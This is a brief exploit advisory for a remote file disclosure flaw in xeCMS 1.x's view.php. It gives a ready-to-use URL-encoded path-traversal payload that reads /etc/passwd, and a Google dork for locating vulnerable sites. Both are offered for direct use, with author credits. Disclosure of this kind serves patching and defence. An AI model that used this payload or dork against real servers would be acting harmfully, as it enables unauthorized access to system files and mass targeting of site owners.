xeCMS version 1.x suffers from a remote file disclosure vulnerability in view.php.
c155e2111b1ce15d16150f5af9e105b9ca95c7632cae58e90cfa832277efc9f2
--------------------------------------------------------------
xeCMS 1.x.x Remote File Disclosure Vulnerability.
--------------------------------------------------------------
download : http://xecms.sunsite.dk/
author : p4imi0
contact : p4imi0@gmail.com
exploit : view.php?list=..%2F..%2F.. %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
google dork : inurl:"view.php?list=" Powered by xeCMS
thanks to : str0ke, Cr[]w.